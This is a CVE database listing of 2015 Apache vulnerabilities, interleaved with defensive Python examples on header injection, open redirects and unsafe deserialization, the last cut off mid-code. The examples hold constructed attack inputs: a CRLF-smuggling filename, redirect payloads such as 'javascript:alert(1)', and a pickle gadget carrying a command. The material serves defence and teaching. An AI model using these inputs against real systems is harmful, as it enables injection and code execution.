apache groovy 1.7.5
apache groovy 2.0.6
oracle retail_service_backbone 13.0
apache groovy 2.0.1
apache groovy 2.1.9
oracle retail_service_backbone 15.0
apache groovy 2.3.8
apache groovy 2.0.2
apache groovy 1.8.9
apache groovy 2.2.1
oracle retail_service_backbone 13.2
apache groovy 2.2.0
apache groovy 1.7.1
oracle retail_store_inventory_management 14.0
oracle retail_service_backbone 13.1
apache groovy 1.8.2
apache groovy 2.1.6
apache groovy 2.1.8
apache groovy 1.8.8
apache groovy 1.7.2
apache groovy 2.2.2
oracle retail_service_backbone 14.0
apache groovy 1.7.9
apache groovy 1.8.4
oracle retail_order_broker_cloud_service 4.1
apache groovy 2.1.1
oracle webcenter_sites 11.1.1.8.0
apache groovy 2.3.9
oracle retail_service_backbone 14.1
oracle health_sciences_clinical_development_center 3.1.1
apache groovy 1.7.7
apache groovy 1.7.0
apache groovy 2.3.6
apache groovy 2.4.1
apache groovy 1.8.0
apache groovy 2.0.3
apache groovy 2.3.5
apache groovy 2.4.0
apache groovy 1.7.10
apache groovy 2.1.5
CVE-2015-3254 MEDIUM

The client libraries in Apache Thrift before 0.9.3 might allow remote authenticated users to cause a denial of service (infinite recursion) via vectors involving the skip function.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache thrift *
CVE-2015-3268 MEDIUM

Cross-site scripting (XSS) vulnerability in the DisplayEntityField.getDescription method in ModelFormField.java in Apache OFBiz before 12.04.06 and 13.07.x before 13.07.03 allows remote attackers to inject arbitrary web script or HTML via the description attribute of a display-entity element.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 12.04.04
apache ofbiz 13.07.02
apache ofbiz 12.04.03
apache ofbiz 12.04.02
apache ofbiz 12.04.01
apache ofbiz 12.04.05
apache ofbiz 13.07.01
CVE-2015-3270 MEDIUM

Apache Ambari before 2.0.2 or 2.1.x before 2.1.1 allows remote authenticated users to gain administrative privileges via unspecified vectors, possibly related to changing passwords.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache ambari 1.7.0
apache ambari 2.0.1
apache ambari 2.0.0
apache ambari 2.1.0
CVE-2015-3271 MEDIUM

Apache Tika server (aka tika-server) in Apache Tika 1.9 might allow remote attackers to read arbitrary files via the HTTP fileUrl header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tika 1.9
CVE-2015-4551 MEDIUM

LibreOffice before 4.4.5 and Apache OpenOffice before 4.1.2 use the stored LinkUpdateMode configuration information in OpenDocument Format files and templates when handling links, which might allow remote attackers to obtain sensitive information via a crafted document that embeds data from local files into (1) Calc or (2) Writer.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache openoffice *
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
debian debian_linux 7.0
libreoffice libreoffice *
debian debian_linux 8.0
CVE-2015-4928 MEDIUM

Apache Ambari before 2.1, as used in IBM Infosphere BigInsights 4.x before 4.1, includes cleartext passwords on a Configs screen, which allows physically proximate attackers to obtain sensitive information by reading password fields.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ambari *
CVE-2015-4940 LOW

Apache Ambari before 2.1, as used in IBM Infosphere BigInsights 4.x before 4.1, stores a cleartext BigSheets password in a configuration file, which allows local users to obtain sensitive information by reading this file.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ambari *
CVE-2015-5167 MEDIUM

The Policy Admin Tool in Apache Ranger before 0.5.1 allows remote authenticated users to bypass intended access restrictions via the REST API.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache ranger *
CVE-2015-5168 HIGH

Unspecified vulnerability in the HTTP/2 experimental feature in Apache Traffic Server 5.3.x before 5.3.2 has unknown impact and attack vectors, a different vulnerability than CVE-2015-5206.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache traffic_server 5.3.1
apache traffic_server 5.3.0
CVE-2015-5169 MEDIUM

Apache Struts before 2.3.20 has a cross-site scripting (XSS) vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts *
CVE-2015-5174 MEDIUM

Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 6.0.43
apache tomcat 6.0.1
apache tomcat 7.0.12
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 6.0.44
apache tomcat 6.0.36
apache tomcat 6.0.32
apache tomcat 7.0.40
debian debian_linux 8.0
apache tomcat 6.0.4
apache tomcat 6.0.2
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 6.0.39
apache tomcat 8.0.15
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 6.0.26
apache tomcat 8.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
apache tomcat 6.0.41
apache tomcat 8.0.18
CVE-2015-5175 MEDIUM

Application plugins in Apache CXF Fediz before 1.1.3 and 1.2.x before 1.2.1 allow remote attackers to cause a denial of service.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cxf_fediz *
apache cxf_fediz 1.2.0
CVE-2015-5204 MEDIUM

CRLF injection vulnerability in the Apache Cordova File Transfer Plugin (cordova-plugin-file-transfer) for Android before 1.3.0 allows remote attackers to inject arbitrary headers via CRLF sequences in the filename of an uploaded file.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache cordova_file_transfer *
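CVE-2015-5204 is the multipart form of header injection: the upload plugin copied the filename into the part's Content-Disposition line, so a filename containing CRLF ended that header and started new ones. The Python below is an added example, not the plugin's code, contrasting the vulnerable builder with a hardened one that rejects control characters outright, keeps only the last path component, and escapes the quoted-string so a double quote cannot end the parameter early. The helper function names and the attacker filename are constructed for the demonstration.

```python
import re
from typing import List

CRLF = "\r\n"
# Every ASCII control character, CR and LF included: none belongs in a header value.
_CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")


class HeaderInjectionError(ValueError):
    """The value would change the structure of the multipart part header."""


def part_header_unsafe(field: str, filename: str, content_type: str) -> str:
    """The vulnerable pattern: the client-supplied filename lands in the header verbatim."""
    return (
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"{CRLF}'
        f"Content-Type: {content_type}{CRLF}{CRLF}"
    )


def safe_filename(filename: str) -> str:
    """Reduce a filename to one path component that cannot escape its quoted-string."""
    base = re.split(r"[\\/]", filename)[-1]          # drop directories, '/' or '\'
    if _CONTROL_RE.search(base):
        raise HeaderInjectionError("control character in filename")
    # Inside a quoted-string, backslash and double quote must be escaped as
    # quoted-pairs (RFC 7230); an unescaped '"' would end the parameter early.
    base = base.replace("\\", "\\\\").replace('"', '\\"')
    return base or "upload"


def accepts_filename(filename: str) -> bool:
    """True when the hardened builder would accept this filename."""
    try:
        safe_filename(filename)
        return True
    except HeaderInjectionError:
        return False


def part_header(field: str, filename: str, content_type: str) -> str:
    """Hardened builder: every value that reaches the header is validated first."""
    for label, value in (("field", field), ("content_type", content_type)):
        if _CONTROL_RE.search(value) or '"' in value:
            raise HeaderInjectionError(f"invalid character in {label}")
    return part_header_unsafe(field, safe_filename(filename), content_type)


def header_names(header_block: str) -> List[str]:
    """List the header names a part header declares; an injected CRLF shows up as extra names."""
    block = header_block.split(CRLF + CRLF, 1)[0]
    return [line.split(":", 1)[0] for line in block.split(CRLF) if ":" in line]


# Constructed attacker filename: closes the filename parameter, then adds its own header lines.
MALICIOUS_FILENAME = 'x.jpg"\r\nX-Injected: 1\r\nContent-Disposition: form-data; name="y'

if __name__ == "__main__":
    print(header_names(part_header_unsafe("file", MALICIOUS_FILENAME, "image/jpeg")))
    try:
        part_header("file", MALICIOUS_FILENAME, "image/jpeg")
    except HeaderInjectionError as exc:
        print("rejected:", exc)
    print(part_header("file", 'report "final".pdf', "application/pdf"))
```

Rejecting rather than stripping is deliberate: a stripped CR or LF silently changes the name the server stores, and the client that sent it is either buggy or hostile, so an error is the more honest outcome in both cases.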
CVE-2015-5206 HIGH

Unspecified vulnerability in the HTTP/2 experimental feature in Apache Traffic Server 5.3.x before 5.3.2 has unknown impact and attack vectors, a different vulnerability than CVE-2015-5168.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache traffic_server 5.3.1
apache traffic_server 5.3.0
CVE-2015-5207 HIGH

Apache Cordova iOS before 4.0.0 might allow attackers to bypass a URL whitelist protection mechanism in an app and load arbitrary resources by leveraging unspecified methods.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-254,CWE-284,

Products Affected

Vendor Product Version
apache cordova *
CVE-2015-5208 MEDIUM

Apache Cordova iOS before 4.0.0 allows remote attackers to execute arbitrary plugins via a link.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cordova *
CVE-2015-5209 MEDIUM

Apache Struts 2.x before 2.3.24.1 allows remote attackers to manipulate Struts internals, alter user sessions, or affect container settings via vectors involving a top object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.23
apache struts 2.3.13
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.6
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.3.9
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.5
apache struts 2.3.1.2
apache struts 2.2.3
apache struts 2.3.21
apache struts 2.3.20.2
apache struts 2.3.16
CVE-2015-5210 MEDIUM

Open redirect vulnerability in Apache Ambari before 2.1.2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the targetURI parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache ambari 1.7.0
apache ambari *
apache ambari 2.0.1
apache ambari 2.0.2
apache ambari 2.0.0
apache ambari 2.1.0
CVE-2015-5212 MEDIUM

Integer underflow in LibreOffice before 4.4.5 and Apache OpenOffice before 4.1.2, when the configuration setting "Load printer settings with the document" is enabled, allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via crafted PrinterSetup data in an ODF document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-191,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache openoffice *
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
debian debian_linux 7.0
libreoffice libreoffice *
debian debian_linux 8.0
CVE-2015-5213 MEDIUM

Integer overflow in LibreOffice before 4.4.5 and Apache OpenOffice before 4.1.2 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a long DOC file, which triggers a buffer overflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache openoffice *
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
debian debian_linux 7.0
libreoffice libreoffice *
debian debian_linux 8.0
CVE-2015-5214 MEDIUM

LibreOffice before 4.4.6 and 5.x before 5.0.1 and Apache OpenOffice before 4.1.2 allow remote attackers to cause a denial of service (memory corruption and application crash) or execute arbitrary code via an index to a non-existent bookmark in a DOC file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache openoffice *
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
debian debian_linux 7.0
libreoffice libreoffice *
debian debian_linux 8.0
CVE-2015-5241 MEDIUM

After logging into the portal, the logout JSP page redirects the browser back to the login page. In Apache jUDDI 3.1.2, 3.1.3, 3.1.4, and 3.1.5, when the portlets-based user interface (also known as 'Pluto', 'jUDDI Portal', 'UDDI Portal' or 'uddi-console') is used, a malicious user can make this redirect send the browser to an unintended web page. User session data, credentials, and auth tokens are cleared before the redirect.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-601,

Products Affected

Vendor Product Version
apache juddi 3.1.2
apache juddi 3.1.5
apache juddi 3.1.4
apache juddi 3.1.3
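Both CVE-2015-5210 (Ambari's targetURI parameter) and CVE-2015-5241 (the jUDDI logout redirect) are open redirects: a post-login or post-logout destination taken from the request and passed to the browser unchecked. The Python below is an added example, not code from either project, of the validator a practitioner would put in front of such a redirect. It is allowlist-shaped: it accepts only a path on the current site, or an https URL to a host named in an explicit allowlist, and returns a safe default for everything else. The function and parameter names are assumptions for the illustration.

```python
from typing import FrozenSet, Optional
from urllib.parse import urlsplit, urlunsplit

DEFAULT_LANDING = "/"


def safe_redirect_target(target: Optional[str], default: str = DEFAULT_LANDING,
                         allowed_hosts: FrozenSet[str] = frozenset()) -> str:
    """Return a redirect target that stays on this site (or on an allowlisted
    https host), falling back to `default` for anything else.

    allowed_hosts must hold lowercase hostnames; urlsplit lowercases hostname.
    The rule is allowlist-shaped: accept only what is provably local, never try
    to enumerate the ways a string can name another host.
    """
    if not target:
        return default
    target = target.strip()
    # Tabs, newlines and other controls: browsers strip some of them before
    # parsing, so "/\t/evil" becomes "//evil". Refuse rather than normalize.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return default
    # Scheme-relative "//host", and the backslash forms browsers treat the same way.
    if target.startswith(("//", "/\\", "\\")):
        return default

    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute URL: only https, only to an explicitly allowed host, and no
        # userinfo (an '@' in the authority is the classic way to make a host
        # look trusted, as in "https://portal.example@evil.example/").
        if (parts.scheme.lower() == "https"
                and parts.username is None and parts.password is None
                and (parts.hostname or "") in allowed_hosts):
            return urlunsplit(("https", parts.netloc, parts.path or "/", parts.query, ""))
        return default

    if not parts.path.startswith("/"):
        return default      # relative paths resolve against the current page; require an explicit one
    # Drop the fragment: it is never sent to the server and has no place in a Location header.
    return urlunsplit(("", "", parts.path, parts.query, ""))


if __name__ == "__main__":
    # Constructed inputs an attacker or a normal user might supply.
    for candidate in ("/dashboard?tab=1", "//evil.example/", "/\\evil.example",
                      "https://evil.example/login", "javascript:alert(1)",
                      "/\t/evil.example", "https://portal.example/x"):
        print(repr(candidate), "->", safe_redirect_target(
            candidate, allowed_hosts=frozenset({"portal.example"})))
```

For the logout case specifically, the simplest fix is to not read a destination from the request at all and always send the browser to a fixed login URL; the validator above is for flows, like post-login, that genuinely need to return the user somewhere.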
CVE-2015-5253 MEDIUM

The SAML Web SSO module in Apache CXF before 2.7.18, 3.0.x before 3.0.7, and 3.1.x before 3.1.3 allows remote authenticated users to bypass authentication via a crafted SAML response with a valid signed assertion, related to a "wrapping attack."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cxf *
CVE-2015-5254 HIGH

Apache ActiveMQ 5.x before 5.13.0 does not restrict the classes that can be serialized in the broker, which allows remote attackers to execute arbitrary code via a crafted serialized Java Message Service (JMS) ObjectMessage object.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.11.1
redhat openshift 2.0
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.12.1
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.10.1
fedoraproject fedora 22
apache activemq 5.7.0
apache activemq 5.11.2
apache activemq 5.4.1
apache activemq 5.10.2
apache activemq 5.9.1
apache activemq 5.11.0
fedoraproject fedora 23
apache activemq 5.5.0
apache activemq 5.12.0
apache activemq 5.3.2
apache activemq 5.5.1
apache activemq 5.2.0
CVE-2015-5256 MEDIUM

Apache Cordova-Android before 4.1.0, when an application relies on a remote server, improperly implements a JavaScript whitelist protection mechanism, which allows attackers to bypass intended access restrictions via a crafted URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cordova *
CVE-2015-5259 HIGH

Integer overflow in the read_string function in libsvn_ra_svn/marshal.c in Apache Subversion 1.9.x before 1.9.3 allows remote attackers to execute arbitrary code via an svn:// protocol string, which triggers a heap-based buffer overflow and an out-of-bounds read.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,CWE-189,

Products Affected

Vendor Product Version
apache subversion 1.9.1
apache subversion 1.9.2
apache subversion 1.9.0
CVE-2015-5262 MEDIUM

http/conn/ssl/SSLConnectionSocketFactory.java in Apache HttpComponents HttpClient before 4.3.6 ignores the http.socket.timeout configuration setting during an SSL handshake, which allows remote attackers to cause a denial of service (HTTPS call hang) via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
fedoraproject fedora 23
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
apache httpclient *
fedoraproject fedora 21
fedoraproject fedora 22
CVE-2015-5343 HIGH

Integer overflow in util.c in mod_dav_svn in Apache Subversion 1.7.x, 1.8.x before 1.8.15, and 1.9.x before 1.9.3 allows remote authenticated users to cause a denial of service (subversion server crash or memory consumption) and possibly execute arbitrary code via a skel-encoded request body, which triggers an out-of-bounds read and heap-based buffer overflow.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache subversion *
debian debian_linux 8.0
CVE-2015-5344 HIGH

The camel-xstream component in Apache Camel before 2.15.5 and 2.16.x before 2.16.1 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in an HTTP request.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache camel *
apache camel 2.16.0
CVE-2015-5345 MEDIUM

The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 6.0.43
apache tomcat 6.0.1
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 6.0.44
apache tomcat 6.0.36
apache tomcat 6.0.32
apache tomcat 7.0.40
debian debian_linux 8.0
apache tomcat 6.0.4
apache tomcat 6.0.2
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 9.0.0
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 6.0.39
apache tomcat 8.0.15
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 6.0.26
apache tomcat 8.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
apache tomcat 6.0.41
apache tomcat 8.0.18
CVE-2015-5346 MEDIUM

Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 7.0.40
debian debian_linux 8.0
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 9.0.0
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 8.0.15
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.26
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 8.0.18
CVE-2015-5347 MEDIUM

Cross-site scripting (XSS) vulnerability in the getWindowOpenJavaScript function in org.apache.wicket.extensions.ajax.markup.html.modal.ModalWindow in Apache Wicket 1.5.x before 1.5.15, 6.x before 6.22.0, and 7.x before 7.2.0 might allow remote attackers to inject arbitrary web script or HTML via a ModalWindow title.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache wicket *
CVE-2015-5348 MEDIUM

Apache Camel 2.6.x through 2.14.x, 2.15.x before 2.15.5, and 2.16.x before 2.16.1, when using (1) camel-jetty or (2) camel-servlet as a consumer in Camel routes, allows remote attackers to execute arbitrary commands via a crafted serialized Java object in an HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache camel 2.14.0
apache camel 2.13.4
apache camel 2.9.4
apache camel 2.10.7
apache camel 2.9.5
apache camel 2.13.1
apache camel 2.14.2
apache camel 2.10.1
apache camel 2.9.8
apache camel 2.8.4
apache camel 2.6.0
apache camel 2.10.4
apache camel 2.11.2
apache camel 2.14.3
apache camel 2.8.6
apache camel 2.7.1
apache camel 2.9.1
apache camel 2.13.3
apache camel 2.8.0
apache camel 2.9.0
apache camel 2.12.4
apache camel 2.13.0
apache camel 2.14.4
apache camel 2.8.3
apache camel 2.10.3
apache camel 2.11.1
apache camel 2.7.0
apache camel 2.15.1
apache camel 2.16.0
apache camel 2.12.5
apache camel 2.10.2
apache camel 2.8.2
apache camel 2.15.0
apache camel 2.12.3
apache camel 2.7.5
apache camel 2.9.6
apache camel 2.7.4
apache camel 2.15.2
apache camel 2.7.2
apache camel 2.11.3
apache camel 2.11.4
apache camel 2.15.3
apache camel 2.7.3
apache camel 2.10.5
apache camel 2.11.0
apache camel 2.12.2
apache camel 2.12.0
apache camel 2.12.1
apache camel 2.9.2
apache camel 2.10.0
apache camel 2.14.1
apache camel 2.9.7
apache camel 2.8.5
apache camel 2.10.6
apache camel 2.13.2
apache camel 2.8.1
apache camel 2.15.4
apache camel 2.9.3
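CVE-2015-3253 (Groovy MethodClosure), CVE-2015-5254 (ActiveMQ ObjectMessage), CVE-2015-5344 and CVE-2015-5348 (Camel) share one root cause: the consumer deserializes whatever class name the attacker's bytes reference, and a reachable class with a side effect on load (a gadget) turns that into code execution. The fix in each case is an explicit allowlist of the classes the consumer actually expects, enforced before any object is instantiated. The Python below is an added example, not code from any of these projects: it demonstrates the same technique on Python's pickle, whose Unpickler.find_class hook is the documented place to enforce such an allowlist, because the Java ObjectInputStream filter cannot be run here. The message type, the gadget and the stand-in for os.system are constructed for the demonstration.

```python
import io
import pickle
from dataclasses import dataclass
from typing import Any, List, Set, Tuple

# Stand-in for a dangerous callable such as os.system: it records what it was asked
# to run instead of running it, so the gadget stays observable and harmless.
EXECUTED: List[str] = []


def simulate_command(cmd: str) -> None:
    EXECUTED.append(cmd)


@dataclass
class OrderEvent:
    """The one message type this consumer actually expects."""
    order_id: str
    amount_cents: int


class Gadget:
    """Attacker-supplied object: deserializing it invokes a callable of the attacker's choice."""
    def __reduce__(self):
        return (simulate_command, ("id > /tmp/pwned",))


# Explicit allowlist of (module, class) pairs the consumer needs. Nothing else resolves.
ALLOWED: Set[Tuple[str, str]] = {(OrderEvent.__module__, "OrderEvent")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str) -> Any:
        if (module, name) not in ALLOWED:
            # Raised while the stream is still being read: the gadget's callable is
            # never resolved, so its REDUCE step never runs.
            raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")
        return super().find_class(module, name)


def serialize(obj: Any) -> bytes:
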